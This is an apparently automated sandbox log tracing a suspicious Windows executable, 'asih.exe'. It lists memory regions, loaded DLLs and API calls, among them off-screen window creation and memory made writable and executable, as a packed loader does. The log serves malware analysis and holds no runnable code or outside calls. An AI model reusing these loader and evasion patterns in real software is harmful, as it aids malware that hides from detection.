# Flog Txt Version 1 # Analyzer Version: 2024.2.1 # Analyzer Build Date: Mar 23 2024 12:02:19 # Log Creation Date: 29.03.2024 05:50:03.982 Process: id = "1" image_name = "asih.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\asih.exe" page_root = "0x532f5000" os_pid = "0x131c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x678" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\asih.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ebd3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 119 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 120 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 121 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 122 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 123 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 124 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 125 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 126 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 127 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 128 start_va = 0x500000 end_va = 0x509fff monitored = 1 entry_point = 0x501000 region_type = mapped_file name = "asih.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\asih.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\asih.exe") Region: id = 129 start_va = 0x77220000 end_va = 0x7739afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 130 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 131 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 132 start_va = 0x7fff0000 end_va = 0x7ffff079ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 133 start_va = 0x7ffff07a0000 end_va = 0x7ffff0960fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 134 start_va = 0x7ffff0961000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffff0961000" filename = "" Region: id = 273 start_va = 0x400000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 274 start_va = 0x656f0000 end_va = 0x6573ffff monitored = 0 entry_point = 0x65708180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 275 start_va = 0x65670000 end_va = 0x656e9fff monitored = 0 entry_point = 0x65683290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 276 start_va = 0x770a0000 end_va = 0x7717ffff monitored = 0 entry_point = 0x770b3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 277 start_va = 0x65740000 end_va = 0x65747fff monitored = 0 entry_point = 0x657417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 278 start_va = 0x510000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 279 start_va = 0x770a0000 end_va = 0x7717ffff monitored = 0 entry_point = 0x770b3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 280 start_va = 0x74920000 end_va = 0x74a9dfff monitored = 0 entry_point = 0x749d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 281 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 282 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 283 start_va = 0x510000 end_va = 0x5cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 284 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 285 start_va = 0x73ea0000 end_va = 0x73f31fff monitored = 0 entry_point = 0x73ee0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 286 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 287 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 288 start_va = 0x74c10000 end_va = 0x74d56fff monitored = 0 entry_point = 0x74c21cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 289 start_va = 0x74250000 end_va = 0x7439efff monitored = 0 entry_point = 0x74306820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 290 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 291 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 292 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 293 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 294 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 295 start_va = 0x757e0000 end_va = 0x7580afff monitored = 0 entry_point = 0x757e5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 296 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 297 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 298 start_va = 0x9a0000 end_va = 0xb20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 299 start_va = 0xb30000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 300 start_va = 0x73e20000 end_va = 0x73e94fff monitored = 0 entry_point = 0x73e59a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 301 start_va = 0x75640000 end_va = 0x756fdfff monitored = 0 entry_point = 0x75675630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 302 start_va = 0x75420000 end_va = 0x755dcfff monitored = 0 entry_point = 0x75502a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 303 start_va = 0x75ad0000 end_va = 0x75b7cfff monitored = 0 entry_point = 0x75ae4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 304 start_va = 0x73f50000 end_va = 0x73f6dfff monitored = 0 entry_point = 0x73f5b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 305 start_va = 0x73f40000 end_va = 0x73f49fff monitored = 0 entry_point = 0x73f42a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 306 start_va = 0x755e0000 end_va = 0x75637fff monitored = 0 entry_point = 0x756225c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 307 start_va = 0x75900000 end_va = 0x75943fff monitored = 0 entry_point = 0x75919d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 308 start_va = 0x490000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 309 start_va = 0x1f30000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 310 start_va = 0x75b80000 end_va = 0x75c9efff monitored = 0 entry_point = 0x75bc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 311 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 312 start_va = 0x1f30000 end_va = 0x1febfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f30000" filename = "" Region: id = 313 start_va = 0x20e0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 314 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 315 start_va = 0x73e00000 end_va = 0x73e1cfff monitored = 0 entry_point = 0x73e03b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 316 start_va = 0x1ff0000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 317 start_va = 0x1f0000 end_va = 0x1f5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 318 start_va = 0x440000 end_va = 0x445fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 319 start_va = 0x1e0000 end_va = 0x1e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 320 start_va = 0x450000 end_va = 0x454fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 321 start_va = 0x460000 end_va = 0x465fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 322 start_va = 0x715c0000 end_va = 0x717ccfff monitored = 0 entry_point = 0x716aacb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 323 start_va = 0x74e30000 end_va = 0x74e74fff monitored = 0 entry_point = 0x74e4de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 324 start_va = 0x75ca0000 end_va = 0x7709efff monitored = 0 entry_point = 0x75e5b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 325 start_va = 0x758c0000 end_va = 0x758f6fff monitored = 0 entry_point = 0x758c3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 326 start_va = 0x74f10000 end_va = 0x75408fff monitored = 0 entry_point = 0x75117610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 327 start_va = 0x75a50000 end_va = 0x75acafff monitored = 0 entry_point = 0x75a6e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 328 start_va = 0x75410000 end_va = 0x7541bfff monitored = 0 entry_point = 0x75413930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 329 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 330 start_va = 0x74d60000 end_va = 0x74da3fff monitored = 0 entry_point = 0x74d67410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 331 start_va = 0x74f00000 end_va = 0x74f0efff monitored = 0 entry_point = 0x74f02e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 332 start_va = 0x20f0000 end_va = 0x224ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 333 start_va = 0x20f0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 334 start_va = 0x2240000 end_va = 0x224ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 335 start_va = 0x2250000 end_va = 0x2586fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 336 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 337 start_va = 0x75950000 end_va = 0x75a3afff monitored = 0 entry_point = 0x7598d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 338 start_va = 0x1f30000 end_va = 0x1fc0fff monitored = 0 entry_point = 0x1f68cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 339 start_va = 0x6fca0000 end_va = 0x6fdeafff monitored = 0 entry_point = 0x6fd01660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 340 start_va = 0x74820000 end_va = 0x748b1fff monitored = 0 entry_point = 0x74858cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 341 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 342 start_va = 0x75700000 end_va = 0x75783fff monitored = 0 entry_point = 0x75726220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 343 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 344 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 345 start_va = 0x4a0000 end_va = 0x4a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 346 start_va = 0x1f30000 end_va = 0x1f74fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000010.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db") Region: id = 347 start_va = 0x4b0000 end_va = 0x4b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 348 start_va = 0x2590000 end_va = 0x261dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 349 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 350 start_va = 0x4f0000 end_va = 0x4f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 351 start_va = 0x5d0000 end_va = 0x5e4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001b.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db") Region: id = 352 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 353 start_va = 0x1f80000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 354 start_va = 0x2620000 end_va = 0x271ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 355 start_va = 0x2070000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 356 start_va = 0x2720000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 357 start_va = 0x21f0000 end_va = 0x222ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 358 start_va = 0x2820000 end_va = 0x291ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 359 start_va = 0x2920000 end_va = 0x295ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 360 start_va = 0x2960000 end_va = 0x2a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 361 start_va = 0x2a60000 end_va = 0x2a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 362 start_va = 0x2aa0000 end_va = 0x2b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 363 start_va = 0x717d0000 end_va = 0x7194dfff monitored = 0 entry_point = 0x7184c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 364 start_va = 0x73b30000 end_va = 0x73dfafff monitored = 0 entry_point = 0x73d6c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 365 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 366 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 1 os_tid = 0x1330 [0123.699] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\asih.exe\" " [0123.700] GetModuleHandleA (lpModuleName=0x0) returned 0x500000 [0123.700] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0123.704] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0123.704] RegisterClassExA (param_1=0x505218) returned 0xc1df [0123.705] CreateWindowExA (dwExStyle=0x0, lpClassName="aroka", lpWindowName="wait", dwStyle=0x40000, X=-2680, Y=-6870, nWidth=542, nHeight=485, hWndParent=0x0, hMenu=0x0, hInstance=0x500000, lpParam=0x0) returned 0x0 [0124.163] NtdllDefWindowProc_A (hWnd=0x60046, Msg=0x24, wParam=0x0, lParam=0x19fb04) returned 0x0 [0124.163] NtdllDefWindowProc_A (hWnd=0x60046, Msg=0x81, wParam=0x0, lParam=0x19faf8) returned 0x1 [0124.170] NtdllDefWindowProc_A (hWnd=0x60046, Msg=0x83, wParam=0x0, lParam=0x19fae4) returned 0x0 [0124.180] CreateWindowExA (dwExStyle=0x0, lpClassName="button", lpWindowName="turok", dwStyle=0x10000001, X=10, Y=10, nWidth=320, nHeight=40, hWndParent=0x60046, hMenu=0x2, hInstance=0x500000, lpParam=0x0) returned 0x0 [0124.181] GetLastError () returned 0x579 [0124.183] SendMessageA (hWnd=0x60046, Msg=0x111, wParam=0x0, lParam=0x37) returned 0x0 [0124.183] SendMessageA (hWnd=0x60046, Msg=0x111, wParam=0x0, lParam=0x36) returned 0xffffffff [0124.183] CreateFileA (lpFileName="last.inf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\last.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.183] GetLastError () returned 0x2 [0124.183] CreateWindowExA (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x40000000, X=10, Y=70, nWidth=500, nHeight=430, hWndParent=0x60046, hMenu=0x1, hInstance=0x500000, lpParam=0x0) returned 0x60336 [0124.189] NtdllDefWindowProc_A (hWnd=0x60046, Msg=0x210, wParam=0x10001, lParam=0x60336) returned 0x0 [0124.189] CreateWindowExA (dwExStyle=0x0, lpClassName="edit", lpWindowName="turok", dwStyle=0x40000001, X=10, Y=380, nWidth=166, nHeight=34, hWndParent=0x1, hMenu=0x2, hInstance=0x500000, lpParam=0x0) returned 0x0 [0124.189] GetLastError () returned 0x578 [0124.189] lstrcpyA (in: lpString1=0x5052b8, lpString2="Romantic" | out: lpString1="Romantic") returned="Romantic" [0124.189] CreateFontIndirectA (lplf=0x50529c) returned 0x2b0a05dc [0124.189] SendMessageA (hWnd=0x60046, Msg=0x111, wParam=0x505044, lParam=0x38) returned 0x0 [0124.189] MoveWindow (hWnd=0x60046, X=-3700, Y=-3080, nWidth=540, nHeight=483, bRepaint=0) [0124.189] NtdllDefWindowProc_A (hWnd=0x60046, Msg=0x46, wParam=0x0, lParam=0x19f894) returned 0x0 [0124.189] NtdllDefWindowProc_A (hWnd=0x60046, Msg=0x24, wParam=0x0, lParam=0x19f554) returned 0x0 [0124.190] NtdllDefWindowProc_A (hWnd=0x60046, Msg=0x83, wParam=0x1, lParam=0x19f86c) returned 0x0 [0124.192] NtdllDefWindowProc_A (hWnd=0x60046, Msg=0x47, wParam=0x0, lParam=0x19f894) [0124.192] NtdllDefWindowProc_A (hWnd=0x60046, Msg=0x3, wParam=0x0, lParam=0xf417f194) returned 0x0 [0124.192] SendMessageA (hWnd=0x60046, Msg=0x111, wParam=0x505008, lParam=0x38) returned 0x0 [0124.192] GetWindowRect (in: hWnd=0x60046, lpRect=0x19f3c0 | out: lpRect=0x19f3c0) returned 1 [0124.192] SendMessageA (hWnd=0x60046, Msg=0x111, wParam=0x0, lParam=0x39) [0124.192] SendMessageA (hWnd=0x60046, Msg=0x111, wParam=0x0, lParam=0x3a) [0124.192] SendMessageA (hWnd=0x60046, Msg=0x111, wParam=0x0, lParam=0x3b) [0124.192] VirtualAlloc (lpAddress=0x400000, dwSize=0x6000, flAllocationType=0x2000, flProtect=0x1) returned 0x0 [0124.192] SendMessageA (hWnd=0x60046, Msg=0x111, wParam=0x0, lParam=0x3c) [0124.192] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x2000, flProtect=0x1) returned 0x1f0000 [0124.192] SendMessageA (hWnd=0x60046, Msg=0x111, wParam=0x0, lParam=0x3d) [0124.192] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x440000 [0124.193] VirtualProtect (in: lpAddress=0x440000, dwSize=0x6000, flNewProtect=0x40, lpflOldProtect=0x50508e | out: lpflOldProtect=0x50508e*=0x4) returned 1 [0124.195] SendMessageA (hWnd=0x60046, Msg=0x111, wParam=0x0, lParam=0x3e) [0124.196] SendMessageA (hWnd=0x60046, Msg=0x111, wParam=0x0, lParam=0x579) [0124.196] SendMessageA (hWnd=0x60046, Msg=0x111, wParam=0x5052ec, lParam=0x40) [0124.196] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.196] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.196] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.196] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) 